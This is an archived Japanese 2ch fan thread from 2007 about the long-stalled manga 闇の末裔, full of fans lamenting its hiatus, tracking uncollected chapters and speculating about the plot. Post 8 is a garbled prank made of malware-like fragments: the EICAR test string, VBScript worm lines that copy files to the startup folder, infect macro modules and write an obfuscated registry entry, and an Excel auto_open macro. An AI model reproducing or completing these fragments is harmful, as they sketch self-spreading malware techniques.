5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【11巻から】闇末★松下容子28【増えません】

1 :花と名無しさん:2007/09/26(水) 01:57:54 ID:???0
むか〜し昔、闇の末裔という漫画がありました。

闇の末裔は耽美な絵柄と魅力的な登場人物たちによって人々の心を掴み、
ヨコタンの夢でもあったアニメ化までされるほどの人気作品になりました。
ところが、アニメ化によってヨコタンの仕事量はどっと増え、更に夢だったアニメ化の
実現によってヨコタンのモチベーションはどっと下がってしまいました。
やがて体調不良を理由に原稿を落として以来、闇の末裔は減ページや休載を
繰り返し、とうとうコミックスを11巻まで出した所で長期休載に入ってしまったのです。
11巻の最後はショクーシュという衝撃シーンでした。


闇の末裔は多くの人々から忘れられていきました。

それでも一部のファンは闇の末裔の連載再開とコミックス12巻の発売を待ちました。

そして休載から2年ほど経った頃、闇の末裔は別冊付録として復活を果たしました。
その後もヨコタンは なぜか闇の末裔とは全然関係ない観魚室という作品を描いたりして
ファンを嬉しいような悲しいような気分にさせた挙句、結局連載再開もコミックス12巻の
発売も今後の予定も何もかも全て未定のまま、こうしてスレは新しくなりましたとさ。


前スレ
【生存確認の喜び】闇末★松下容子27【プライスレス】
http://anime2.2ch.net/test/read.cgi/gcomic/1170347997/

過去ログ&お約束は >>2 あたりを参照
sage 推奨ですので、sage 忘れに注意しましょう。

2 :花と名無しさん:2007/09/26(水) 01:59:39 ID:???0
★闇末関連スレ過去ログ倉庫 (2ch以外へのURL貼り付け不可)
ttp://www.geocities.co.jp/AnimeComic/1949/yami/log.html

★ログ倉庫内お絵かき掲示板兼あpろだ
ttp://cgi.f29.aaacafe.ne.jp/~gamegame/P-BBS/bbsnote.cgi
お絵描きの他アップローダーとしてもお使いになれます。
倉庫番タンの作ってくれた、ありがたい萌え発電。

ヨコタンおめ!
★ぱふ2004年短編賞 1位


・作品のみを語るスレです。
・原作者のへの恨みつらみは程々に。
・万が一どこかで発見しても、けして手を触れないでください。
 原作者は貴重な資源です。

3 :花と名無しさん:2007/09/26(水) 02:01:51 ID:???0
というわけで立てました。
間違いその他があったら・・・すみません。

4 :花と名無しさん:2007/09/26(水) 02:12:39 ID:???0
>>1
おつん

5 :花と名無しさん:2007/09/26(水) 02:41:00 ID:???0
>>1
乙華麗〜

6 :花と名無しさん:2007/09/26(水) 03:05:18 ID:???0
>>1
乙です、ぎりぎりのところで、ありがとう!

7 :花と名無しさん:2007/09/26(水) 04:05:02 ID:???0
>>1
ありがとう。

ねえ、YOKOTAN。覚えてる?
もう一度、その漫画を読ませてよ・・・

8 :花と名無しさん:2007/09/26(水) 04:34:43 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


9 :花と名無しさん:2007/09/26(水) 07:08:22 ID:???O
>>1
おつ

10 :花と名無しさん:2007/09/26(水) 12:17:58 ID:???O
>>1


ヨコタン12巻待ってるよー!

11 :花と名無しさん:2007/09/26(水) 21:25:15 ID:???0
>>1


12 :花と名無しさん:2007/09/26(水) 21:56:48 ID:???0
>>1

前スレ1000
GJ
でも、叶ったとしても最速であと3ヶ月w
まぁ本当に復活してくれるなら3ヶ月程度どうでもいいんだけどね

13 :花と名無しさん:2007/09/26(水) 23:28:33 ID:???0
>>1
乙です

そして前スレ>>1000GJ!

14 :花と名無しさん:2007/09/27(木) 21:18:50 ID:???0
>>1


15 :花と名無しさん:2007/09/27(木) 22:50:14 ID:???O
>>1おつ!

16 :花と名無しさん:2007/09/28(金) 10:56:52 ID:???O
>>1

初詣でヨコタソ復活頼んでこようかなwww

17 :花と名無しさん:2007/09/28(金) 13:31:19 ID:???O
そろそろ新情報ないのー?

18 :花と名無しさん:2007/09/28(金) 16:57:27 ID:???0
>>1
乙華麗ぇ

19 :花と名無しさん:2007/09/29(土) 17:19:03 ID:???0
>>1
乙カレー
闇末にはまりすぎたあまりにとった数々の痛い行動を心底抹消したいが
それは自分の罪であって決して闇末のせいではないんだぜ

20 :花と名無しさん:2007/09/29(土) 20:49:25 ID:???0
ついに、近所の古本屋から闇末が消えた…
1〜11巻までのセット売りはあったけどね、本棚の上にぞんざいに乗せてあった
本棚で一冊ずつ買える方はなくなってた…何かショックだー

21 :花と名無しさん:2007/09/30(日) 08:44:52 ID:???0
それはきっと…売れたんだよ…

22 :花と名無しさん:2007/10/02(火) 13:54:08 ID:???O
都筑さんになって巽に思いっ切り甘えたい(*´∀`)〜!

23 :花と名無しさん:2007/10/02(火) 17:51:54 ID:???0
ヨコタンや
今年ももうすぐ終わりですよ

24 :花と名無しさん:2007/10/02(火) 18:04:35 ID:???0
まったく
あの冨樫でさえ本気出そうとしてるというのに

25 :花と名無しさん:2007/10/04(木) 02:59:53 ID:???0
H×Hを1枚ずつ描き直していくスレってあったけど
1枚1枚描き足していくスレってないのかな

26 :花と名無しさん:2007/10/04(木) 16:05:58 ID:???O
ヨコタン作「闇の末裔」の続きが気になります
いなだ詩穂作「ゴーストハント」の続きが気になります
CLAMP作「X」の続きが気になります
美内すずえ作「ガラスの仮面」の続きが気になります

27 :花と名無しさん:2007/10/04(木) 18:17:31 ID:???0
>>26
君とはいい酒が飲めそうだ

28 :花と名無しさん:2007/10/05(金) 12:18:57 ID:???O
闇待つオフとして飲み会を

29 :花と名無しさん:2007/10/05(金) 12:38:17 ID:???O
闇末をホモ視点で見てない人ってどのくらい居る?あの腐臭のする漫画を純粋な目で見てる人っているのかな?

30 :花と名無しさん:2007/10/05(金) 13:13:30 ID:???0

しかし純粋な目ではなく画集として見てる
ストーリーやキャラ崩壊、触手すら気にしなかったが番外編は無理だった
今はヨコタンの亡霊を追っている
いつかあの美麗絵とともに戻ってくるかもしれないって・・・

31 :花と名無しさん:2007/10/05(金) 13:26:27 ID:???0
昔どうしようもなくはまってた頃はそういう世界自体全く知らなかったから
男同士がべたべたしてても「こいつらいい大人なのに何やってんだ」くらいしか思わなかったし
闇末関連の雑誌記事かなんかを見かけてそこでホモホモ言われてたら
「ホモじゃねーよ!闇末を汚すな!」と憤慨してた
3巻の回想や触手シーンも、何やってるかわからんが気持ち悪そうだ、としか思わなかった

しかしそういう世界の存在を知ってから改めて読み返すと、もうそういう風にしか見えないorz

32 :花と名無しさん:2007/10/05(金) 17:38:50 ID:???0
画集としてみるならとてもいい本だよね
マッスル化した後も特に嫌とは思わなかったし

絵はうまいんだ、絵は・・・
戻ってきてくれよ〜

33 :花と名無しさん:2007/10/09(火) 09:16:17 ID:???O
自分が働いてる古本屋からも消えた。全巻セットすら…
棚卸しの後だし、たぶん捨てられたな…なんか悲しい

34 :花と名無しさん:2007/10/09(火) 16:52:41 ID:???0
松下容子の「闇の末裔」の新刊もう6年近く待ってる
小野不由美の「十二国記」も新刊も6年近く待ってる
CLAMPの「X]は休載扱いになっても新刊5年待ってる
高河ゆんの「源氏」も連載放棄で未完状態だけど新刊5年以上待ってる
冨樫の「ハンターハンター」は2年待ったかいあって…ようやく続きが来ました。

好きだからこんなに待てるんですよ。
だからヨコタン、もうしばらくは待ってられるから復活して戻ってきてー

35 :花と名無しさん:2007/10/09(火) 17:15:05 ID:???0
高河ゆんって、今やってるガンダムのキャラデザか何かやってなかったっけ?
連載放棄して何やってるだ…CLAMPもそうだけど

けど、それでも生存確認がとれるだけいいよね
ヨコタンは生きてるのか死んでるのか、都筑を描く気があるのかないのか分からないからタチが悪い

36 :花と名無しさん:2007/10/09(火) 17:16:40 ID:???0
誤字った
×都筑
○続き

まぁ、あながち間違いでもないけど…

37 :花と名無しさん:2007/10/11(木) 19:49:30 ID:???0
やってる、でも商業作品の方は月刊でページ数一桁って状態…ハハハ
CLAMPはもうgdgdだし、それでも待ってしまう自分が一番情けないんだけどさ

ヨコタンと比べたらそれでも幸せな方だってなっちゃうんだから凄い
確かに、せめて今年中に生存確認だけでも出来たらいいのにな

38 :花と名無しさん:2007/10/12(金) 23:37:25 ID:???0
今年もあと三ヶ月で終わりだよ…ヨコタン…

39 :花と名無しさん:2007/10/13(土) 15:28:22 ID:???0
ひさしぶりに闇の末裔アニメ版を見てみた
当時は特に気にしないで見てたけど、今見ると本当に美しかったんだなぁ

早く12巻が読みたいです

40 :花と名無しさん:2007/10/13(土) 17:36:14 ID:???0
その前にまず生存確認だな

ヨコタン…

41 :花と名無しさん:2007/10/15(月) 21:21:54 ID:???0
>>29

あれはホモじゃなくて親子愛だと思ってる

42 :花と名無しさん:2007/10/16(火) 23:50:24 ID:???O
スレチを承知で
CLAMPのXは内容がハードになってきた(もしくは購読層を考慮)ゆえ商業誌連載はクリアできない
という話をどこかで読んだ

ヨコタンよ
…あぁヨコタンよヨコタンよ
放置プレイも臨界間近よ

43 :花と名無しさん:2007/10/17(水) 00:27:22 ID:???0
>>42
でも、週間の少年誌で連載してるツバサも
人の目玉えぐり出して食う(グチッグチャッという擬音つき)とかやってるし
X連載してたのと同じ出版社の、もっと購買層の年齢高めな雑誌で掲載すれば大丈夫な気もする

ヨコタンは、再開する気がないならいっそきちんと
「再開はしません」って発表すればいいのに…
そういうのが無いから、「来年こそは」とか期待してしまうんだよね

44 :花と名無しさん:2007/10/17(水) 11:56:45 ID:???0
>>42
当時ちょうど少年猟奇犯罪が目立ってた折だったからな…。
クランプ側が考えていた結末が角川側に駄目出しされて
折り合わなくなっちゃったらしいとか。
闇松も結構グロなとこあったなー

45 :花と名無しさん:2007/10/17(水) 11:59:19 ID:???0
クランプはそれ言い訳にしてこのまま再開しないつもりだろうな
闇松はどうなるんだろう・・・やる気ないのか?

46 :花と名無しさん:2007/10/17(水) 17:46:39 ID:???0
近くの古本屋にヨコタソのサインがあることに今日初めて気が付いた
ヨコタソってば、「21世紀のコミック作家の著作権を考える会」なんて団体もあるっていうのに

47 :花と名無しさん:2007/10/19(金) 17:15:44 ID:???0
まあその辺りの考えは人それぞれだから。
主に叩かれてるのはブッ●オフをはじめとする新古書店だし。そういうとこ?
というかそれは誰かが売ったモノじゃないのか。
それとも古本屋名指しで「○○さんへ」的なものなのか

48 :花と名無しさん:2007/10/22(月) 01:21:20 ID:???O
密がナニをされたか理解してなかったあの頃…
今ではばっちりナニされたのかわかったよヨコタン

49 :花と名無しさん:2007/10/22(月) 03:06:57 ID:???O
ってこの作者すごい態度でかかったくせに放棄かよ
漫画家として恥だね

50 :花と名無しさん:2007/10/22(月) 13:42:06 ID:???O
誰か11巻より後の話どうなったのか教えて…
確か密復活してたよね?

51 :花と名無しさん:2007/10/22(月) 14:41:04 ID:???0
幻想界ではお前が悪いと罵り合い、あっちこっちで自爆、怪我人行方不明続出
鎌倉村ではウジウジ儚げ体質の父を甘やかしながら巽と亘理はコスプレ捜査中
閻魔大王はオレの野望が達成される日は近い、とラスボス状態
3行でまとめるとこんな感じか
密かはまだ治療中だったんじゃないか?

52 :花と名無しさん:2007/10/22(月) 15:37:07 ID:???0
まとめるとなんだかカオスだなw
風呂敷が・・・風呂敷が・・・・ひろがりまくりんぐ。

53 :花と名無しさん:2007/10/23(火) 01:53:41 ID:???0
ニコ動で久しぶりに見たら懐かしくなっちゃってスレ探してしまった
米少なくて悲しいからみんなつけようぜ

54 :花と名無しさん:2007/10/23(火) 10:24:55 ID:???0
「一緒に犯罪者になろうぜ!」って書き込みだよ、ソレ
公式の許可なく、アニメの動画を貼るのは犯罪です

55 :花と名無しさん:2007/10/23(火) 11:52:34 ID:???0
うっかり密のバースデー忘れてたぁぁぁ
密27歳おめでとー
・・・・・・・・原作じゃあ18歳止まりかぁorz

56 :花と名無しさん:2007/10/23(火) 13:59:44 ID:???O
ニコ厨乙

密おめでとうさん

57 :花と名無しさん:2007/10/23(火) 21:46:59 ID:???O
密おめ

そしてヨコタン復活おめ!!…っていつか言いたい

58 :花と名無しさん:2007/10/24(水) 01:48:43 ID:???O
再開する気ないなら、もう再開しない
って言ってくれたほうが待ってる側は待たなくて済むし諦められる。
でも、闇の末裔連載終了
ってなった瞬間、絶望しかないね…
一生続きが読めないまま、完 なんて、それこそ一生気になったまんま諦めきれないと思う

59 :花と名無しさん:2007/10/24(水) 05:12:52 ID:???0
自分は、「再開しない」とハッキリ宣言されたら
コミック全部捨てて記憶抹消する

抹消…するっ(´;ω;`)

60 :花と名無しさん:2007/10/24(水) 16:48:54 ID:???0
>>55
ちょw何気に密と同い年だよ・・・

61 :花と名無しさん:2007/10/24(水) 18:25:51 ID:???0
何だかんだ言って青春の1ページだったよ闇末。
イタタだった頃の自分と共にそろそろ記憶抹消・・・

できたらいいんだけど、未だに続きを期待する
自分がいるのもまた事実。

62 :花と名無しさん:2007/10/24(水) 18:47:52 ID:???0
ヨコタンもう描かないなら、最後に巽の生年だけは置いていってくれ!
「思うところあって」の記述に、いつか巽の過去話回が来るとwktkしてたのに…

63 :50:2007/10/24(水) 19:50:50 ID:???O
>>51
ありがとう
12巻が待ち遠しいよ…

64 :花と名無しさん:2007/10/26(金) 22:32:40 ID:???0
たとえ闇末が未完の終わりを迎えても、
ずっと覚えていようと思うイタタ
当時の自分を否定するみたいだとか思ってしまう
それに今更諦められないのは目に見えているよ…

>>鎌倉村ではウジウジ儚げ体質の父を甘やかしながら巽と亘理はコスプレ捜査中
これ、なぜか凄く闇末らしいとか思ってしまったw

65 :花と名無しさん:2007/10/31(水) 19:13:23 ID:???0
ヨコタン明日から11月になるよ
ようやく寒くなるらしいから、風邪引かないで欲しいな
ところで今年もあと2ヶ月なのにまだ放置プレイ続行なのかな……ヨコタン…orz

66 :花と名無しさん:2007/10/31(水) 23:34:15 ID:???0
ヨコタン・・・今どこに・・・

67 :花と名無しさん:2007/11/01(木) 02:17:18 ID:???0
自宅の自室でそ
中身はわからんが

68 :花と名無しさん:2007/11/01(木) 02:42:39 ID:???0
やっぱ別冊も観魚室も人気なかったってことかな・・・
やっぱとか言っちゃってごめんヨコタン。でも・・・・・・

69 :花と名無しさん:2007/11/01(木) 09:50:02 ID:???O
ヨコタンひきこもりなのかな…?
もう萌えるゲームとかないのかな…?

70 :花と名無しさん:2007/11/01(木) 12:53:52 ID:???0
外出はしてるんじゃない?
ゲーム関係の雑誌買うの楽しみにしてるって何かで読んだ。
あと軽く散歩とかしてそうw

71 :花と名無しさん:2007/11/01(木) 17:41:24 ID:???0
ご隠居さんみたいだな
観魚室は人気ないだろう、本スレ羅列でもスルーが多かったし
ファンは闇末が読みたいんだから
別冊は知らなかったって人も多かったよね
闇末目当ての人って単行本待ちが多くて、もう本誌読んでないんじゃないの

72 :花と名無しさん:2007/11/01(木) 19:52:30 ID:???0
闇末が連載されていた頃の読者の多くはもう成人してしまっただろうし
雑誌の連載陣もだいぶ変わっちゃったからね

73 :花と名無しさん:2007/11/02(金) 00:58:42 ID:???0 ?2BP(69)
今復活って言われても誰それ?だろうし
途中も途中ですっぽかしたからそこから読んでもイミフだし
読みたいすごく読みたい、けど売る側のメリットって…

74 :花と名無しさん:2007/11/02(金) 01:59:45 ID:???0
新刊が出たらそこそこ売れそうだからメリットはありそう。
今の花夢で受け付けられないんだったら、いっそコミクス書き下ろしで進めてほしいわ。
あとはヨコタンのやる気次第。
っていうかそれが一番の問題だよなあ・・・。
編集も色々手を尽くしたんだろうけど、一体どうしたらヨコタンのやる気を起こせるんだろうね・・・。

75 :花と名無しさん:2007/11/02(金) 14:12:27 ID:???0
自分の知ってる人も後追い組みだけど、本誌読んでる人少なかったな
きっかけはアニメと、絵に魅かれて単行本読んだと言う人が多かった
まだ連載がちゃんと載ってた頃でもそうだったから
今は新刊出たら買うけど、花夢は読まない人はもっと多いだろうね
ヨコタン負けず嫌いだから、意地でも完結させると思ってたんだけどなあ

76 :花と名無しさん:2007/11/02(金) 20:02:59 ID:???0
連載時のリア工が四捨五入すると三十路になるもんな。
今でも本誌を買ってるっていう人は少ないだろうね。
本誌で復活より別花に移動か単行本書き下ろしの方が無難そう。

77 :花と名無しさん:2007/11/02(金) 20:57:38 ID:???0
私が本誌を読み出してから連載とまったけど気のせいだよね!

78 :花と名無しさん:2007/11/03(土) 12:20:08 ID:???O
コミクス7巻出たあたりから読み出した自分。三十路突入オメ…orz
三十路になっても待つことになるなんて思わなかったよヨコタン。

コミクス連載?といえば天上の神地上の恋(逆だったかも)を思い出す。
ちゃんと完結してくれてヨカタ

79 :花と名無しさん:2007/11/05(月) 01:17:53 ID:???0
>>77
ナカーマ(・∀・)人(・∀・)
自分は立ち読み派だったけど「嫌な予感する」と思って買ったら・・・・

そんな自分ですが友人の「別冊の漫画ってアシさんが描いたンでしょ?」
の一言に往来でボロ泣きして闇末への愛を証明・再確認しました

80 :花と名無しさん:2007/11/06(火) 10:04:29 ID:???O
>>79
まさか本当にアシさんが書いたんじゃないよね?

81 :花と名無しさん:2007/11/06(火) 18:31:41 ID:???0
>>79
あれはアシさんが…ry

82 :花と名無しさん:2007/11/06(火) 21:32:51 ID:???0
アシなんかとっくにリストラされてるでしょ。仕事がないんだから。

83 :花と名無しさん:2007/11/06(火) 21:47:48 ID:???O
まだ未刊の部分読みたいなぁ…
なんとかして読む方法ないかな?

84 :花と名無しさん:2007/11/07(水) 00:17:12 ID:???0
オクで探せば?時々出てるよ
ただ未収録部分全部集めるのは大変かも

85 :花と名無しさん:2007/11/07(水) 11:31:44 ID:???O
>>84
オクこまめにチェックしてるんだけどなかなか未収録分にあえない…


86 :花と名無しさん:2007/11/07(水) 20:00:07 ID:???0
京都宇治 辻利のペットボトル茶を見つけた
都筑さんに逢いたいよ(´・ω・`)

87 :花と名無しさん:2007/11/07(水) 23:45:48 ID:???0
>>83
その頃の花ゆめ、闇末見たさに買ってたんだけど、捨てちゃったよ
まさかあそこで止まるなんて思わなかったもんなぁ

88 :花と名無しさん:2007/11/08(木) 02:14:31 ID:???0
久しぶりに通ります。
年に何度か覗くだけになってしまった。
みんなのカキコ見てたら、目から汁が・・・・・・。
私も未だに待ってます。期待しないで待ってる。
ヨコタン・・・・・・。

89 :83:2007/11/08(木) 13:36:09 ID:???O
>>87
私もまさか単行本になる前に放置されるとは思わなくて買わなかったよ…今となっては後の祭りだ

辻利のCMが一時期放送されてて、見るたび反応してたよ
鎌倉行く旅に密思い出す

90 :花と名無しさん:2007/11/08(木) 19:45:16 ID:???0
まんが図書館?
国会図書館の漫画版みたいなところで
花ゆめバックナンバーのコピーとれると思うよ

91 :花と名無しさん:2007/11/09(金) 09:27:02 ID:???O
マンガ図書館はどこにあるの?
検索したんだけど変なマンガ喫茶(しかも地元)とかしか出てこなかった…



92 :花と名無しさん:2007/11/09(金) 09:54:25 ID:???0
前に現代をつけると良いよ
場所は東京、有料で会員制度もある
漫画も資料として残すべき、という個人の意思で作られたところだよ

93 :花と名無しさん:2007/11/09(金) 11:36:38 ID:???O
>>92
ありがとう!!
花ゆめコピーしてくるよ。

未収録分って花ゆめ何号かわかる?

調べたんだけど
2001年 7, 16, 17
2002年 14号

しか分からなかった…


94 :93です。:2007/11/09(金) 12:10:58 ID:???O
粘って探したら未収録分の花ゆめが出てきました。
【花とゆめ本誌】
00年 23, 24号

01年 1,2,5,6,7,8,9,14,16,17,24 号

02年 2,4,6,8,14,16,22号

03年 2号


【ザ花とゆめ】
04年 10月1日号

【花とゆめ別冊ふろく】05年18号
06年6号

であってるかな?

95 :花と名無しさん:2007/11/09(金) 15:51:57 ID:???0
結構あるんだね。
一冊くらい出せないものか?

96 :花と名無しさん:2007/11/10(土) 00:24:05 ID:???O
闇末12巻署名運動でもするか

97 :花と名無しさん:2007/11/10(土) 20:01:40 ID:???0
たのみこむみたいな所で票が集まったら
白泉社にかけあってくれるかな?

98 :花と名無しさん:2007/11/10(土) 21:46:52 ID:???O
>>97
実際にそういうサイトあったけどあんまり票入ってなかった。
たぶんそのサイトの知名度が低いからだけど。

99 :花と名無しさん:2007/11/10(土) 21:48:08 ID:???0
ヨコタンが引退したとか白泉が闇末既刊を絶版にしたとか
もう出ないの確定じゃないと、無理じゃないかな?
観魚室が思ったより人気なくてヨコタン拗ねちゃったのかも…

100 :花と名無しさん:2007/11/11(日) 00:30:01 ID:???0
きっとまだ印税がまだ残ってるんでしょうね・・・
実家住まいでゲーム以外無駄遣いしなければ
一発ヒットでこんなに休業出来るのね漫画家って

101 :花と名無しさん:2007/11/11(日) 19:25:11 ID:???0
大家族を養う訳じゃなくて浪費しないなら
今までの印税で一生暮らせるのかもね。
でも引退するのはせめて完結してからにしてくたら…。

102 :花と名無しさん:2007/11/11(日) 20:50:34 ID:???0
京都編 もし作者の気の済むように描かせていたらまた違った未来を迎えていただろうか。。。
「飽きるって。読者が!」の前に作者が消えてしまったのね。。

103 :花と名無しさん:2007/11/12(月) 01:02:47 ID:???O
ヨコタン、次の目標は再アニメ化かOVA化にしようよ。

連載再開すれば夢じゃない!!
なんなら京都編描き直しも大歓迎

とにかくヨコタンの生存確認がしたいね

104 :花と名無しさん:2007/11/12(月) 11:58:26 ID:???0
今の絵で京都編を描き直してくれたら今度こそ完全に終われるかも。
何度捨てても1〜10巻を読む度に情熱が沸き起こってしまうのよ…。

作者に病末の愛情がなくなったのがなにより悲しい。

105 :花と名無しさん:2007/11/12(月) 15:17:33 ID:???0
ヨコターン 復帰したらもっと贅沢できるよー
再開してみようよー

106 :花と名無しさん:2007/11/12(月) 17:50:33 ID:???0
>>104
そこだよね…
作者自身が、闇末よりゲームの方が大事って…

闇末の続きは!ヨコタンにしか描けないのに!!・゚・(ノД`)・゚・

107 :花と名無しさん:2007/11/12(月) 17:55:18 ID:???0
彼女にはどうしても金がなくなれば文庫化という最後の手段があるからね。
金にせっぱ詰まるよりは幻想界まとめの逃避が上回るんだろう。
もう全ての設定リセットでも文句言わないので3巻辺りの続きから描いていただけないでしょうか。

108 :花と名無しさん:2007/11/12(月) 21:52:37 ID:???0
皆さんのおかげでようやく未収録分が読めました。ありがとう。

でも続きが気になり過ぎて今夜眠れなくなりそう。

ここってネタバレOKでしたっけ?
未収録分について姉様方に質問したいことがあります。

109 :花と名無しさん:2007/11/12(月) 23:35:14 ID:???0
わかった!ヨコタンが闇末のゲームを作れば全て丸く収まる!

110 :花と名無しさん:2007/11/13(火) 00:57:11 ID:???0
>>108
お疲れ&ようこそ12巻待ち地獄へ
自分は未収録分読んだから気にしないよ

111 :花と名無しさん:2007/11/13(火) 01:16:15 ID:???0
雑誌掲載は読んでたけど全く忘れてる。ネタバレサイトも読んだけどそうだったっけ?って
記憶が戻ってこない。
確か話があちこち飛んでややこしいわ絵が凄いことになってるわコミックスが出たら
読み直そうと適当に済ませてたっけ。
買えばよかった。自分のバカ!



112 :108:2007/11/13(火) 01:17:55 ID:???0
>>110
レスありがとう。一気に読んじゃったよ。
何回『連載再開』の文字を見たことか・・・
中途半端なところで終わって生殺しな気分だよね。
ヨコタンせめてきりのいい所でお願いします。

玉兎ってまだ姿は出てきてないよね?
流さんって密(男)のことどう思ってるんだろう。長女の密の方は
愛してるみたいだけど・・・

密(男)が累か重どちらの子かも気になるよね。


113 :花と名無しさん:2007/11/13(火) 03:04:29 ID:???0
もしかして>>93
こんなに闇末読みたいファンがいるのに、ヨコタンたら…

玉兎は誰の事かまだ出てないはず、結局本編で誰かが目覚めたシーンはなかったし
もういろいろ広がった風呂敷が散乱してて、綺麗で無くても良いから畳んで貰わないと
なんかこう、落ち着かないよね

114 :花と名無しさん:2007/11/13(火) 09:30:02 ID:???0
畳み込むだけの実力がないんだろうよ。
いつも畳もうとして広げるの繰り返し。
短編が安定してよかったのに。

115 :花と名無しさん:2007/11/13(火) 21:39:18 ID:???0
>>113
はい、93です。その節は本当にお世話になりました!
ヨコタン、闇末読みたさに国会図書館にまで行って来ましたよ・・・

玉兎って誰なんだろう。五官で亘理に『戻ってきてください』って言った
女性も気になる。

あと、都筑の姉のルカもまだ出てないよね?
ルカもたぶん死んでるよね。都筑が邑輝の祖父の病院にいたときとか
どうしてたんだろ。


116 :花と名無しさん:2007/11/14(水) 00:16:25 ID:???0
都筑が邑輝の祖父雪貴だっけ、の病院に収容された時にはもう都筑には
家族とか身寄りはいなかったんじゃなかった?
なんか家族全員が死んで記憶の無い状態で、連れて来られた様な描き方だった

もう京都編さえ記憶が曖昧になってきた…

117 :花と名無しさん:2007/11/14(水) 00:37:04 ID:???O
パソ消しちゃったのでケータイから失礼。

思い出した…
雪貴の病院に連れてこられたときは身寄りがないって言ってたもんね。
ルカってやたら何回も出てくるけどキーパーソンなのかな。

閻魔大王って何なんだろ。最初の人間であり…
とか言ってたけど。
都筑との関係とか計画が気になる。
伯爵は閻魔と都筑の関係にどう絡んでくるんだろう?

考えば考えるほど煮詰まってくる…

118 :花と名無しさん:2007/11/14(水) 00:55:40 ID:???0
前にも言われてたけど、多分ルカは都筑の想い人だったんじゃないかなぁ
シスコンっぽい描写はけっこうあるし、「許されない恋をしていた」ってセリフもあったし

119 :花と名無しさん:2007/11/14(水) 10:21:12 ID:???O
思い人かぁ。確かにそんなそんな感じだったよね。
ルカが死んだからおかしくなって雪貴の病院にいたとか…

伯爵と閻魔って都筑とどういう関係だと思う?

120 :花と名無しさん:2007/11/14(水) 10:41:08 ID:???0
伯爵は都筑の父親だと思ってた
後付け設定が多すぎてもう分かんないけどな

121 :花と名無しさん:2007/11/14(水) 10:49:44 ID:???O
>>120
同じく。
でも閻魔とも血縁関係ありそうってちょっと思ったんだけどありえないか。

都筑って『鬼の血をひく』って言われてたけど都筑の出生についてあんまり出てないよね。


122 :花と名無しさん:2007/11/14(水) 11:40:11 ID:???0
閻魔と伯爵の息子だったりしてな

123 :花と名無しさん:2007/11/14(水) 13:36:01 ID:???0
初期には閻魔大王の片腕ともあったしな。
たぶんヨコタンは忘れてると思うけど。

124 :花と名無しさん:2007/11/14(水) 14:01:16 ID:???0
玉兎って名前、ヨコタンFF11のプレイキャラにも付けてたよな確か
サイトのプレイ日記読んでた頃がなつかしい…

ああヨコタン、貴方は今どこで何をしているの?

125 :花と名無しさん:2007/11/14(水) 14:52:27 ID:???O
ヨコタンまたサイト作ってくれないかな

原作:松下容子
漫画:○○○○

みたいにストーリーだけヨコタン考えて絵は違う人が描いたりしないかな?
金田一みたいに

126 :花と名無しさん:2007/11/14(水) 16:25:30 ID:???O
でも、我々はヨコタンのあの美麗な絵を求めているんだ!!!!

127 :花と名無しさん:2007/11/14(水) 16:54:08 ID:???0
でも、ヨコタンの絵は変わってしまったんだ…

128 :花と名無しさん:2007/11/14(水) 18:04:01 ID:???0
庭師のサイトに突撃隊が爆弾落とさなければ
ここまで意固地にヒッキーにならなかった悪寒

129 :花と名無しさん:2007/11/14(水) 19:03:28 ID:???0
あくまで好きなゲームのサイトだから、ほどほどにしてって言われても
管理人がヨコタンだって判る様にしてるんだから、掲示板で闇末の事書いて何が悪い
って突撃してたしね
釣りサイトまで作って突撃って、サイト閉めれば闇末描くと思ったのかな
あれは完全に逆効果になったね

130 :花と名無しさん:2007/11/14(水) 19:34:27 ID:???0
うん。ヨコタンのあの絵が好きだった。
何で絵が変わってしまったんだろう。

過去スレ読んだけどイマイチ把握できてない。
そのサイトの書き込みとかでヨコタンすねちゃったのかな?
ヨコタンに剃刀レター送った人がいるって本当だとしたら怖い・・・

131 :花と名無しさん:2007/11/15(木) 13:42:58 ID:???0
さすがに剃刀レターの件には引いたわ。


132 :花と名無しさん:2007/11/15(木) 14:00:27 ID:???0
そんなんあったっけ?

133 :花と名無しさん:2007/11/15(木) 19:33:54 ID:???0
剃刀レターって実際にあったの?釣りじゃなかったのか。

134 :花と名無しさん:2007/11/19(月) 11:19:03 ID:???0
夢をみた・・・・ヨコタンの画集がでる夢
その夢の中でも自分はここのスレで皆と喜びを分かち合ってた

カラーだけの画集・・・でないかなぁ

135 :花と名無しさん:2007/11/19(月) 11:28:34 ID:???0
>>134
その夢をもう一度元旦に見てください><

136 :花と名無しさん:2007/11/19(月) 13:41:29 ID:???0
しかし報告をしてしまうと
正夢にならないから気をつけて名

137 :花と名無しさん:2007/11/19(月) 15:35:51 ID:???0
画集より12巻…

138 :花と名無しさん:2007/11/19(月) 16:30:27 ID:???0
12巻…

139 :花と名無しさん:2007/11/19(月) 18:28:50 ID:???0
12・・・

140 :花と名無しさん:2007/11/19(月) 22:50:53 ID:???0
どうせなら触手と戯れるのは密パパじゃなくて都筑さんがよかったな

141 :花と名無しさん:2007/11/19(月) 23:30:46 ID:???O
もう触手と絡むのは都筑でも巽でも亘理でも邑輝でも課長でも伯爵でも
誰でも良いから、さっさと12巻!

142 :花と名無しさん:2007/11/20(火) 10:14:29 ID:???O
貴人はどうなったんだ!気になるじゃないか。

143 :花と名無しさん:2007/11/20(火) 13:39:34 ID:???0
この際広げすぎた風呂敷や諸々の細かい設定は放り投げて…
邑輝センセにセクハラされつつ、巽さんにいびられながらイチャつきつつ、
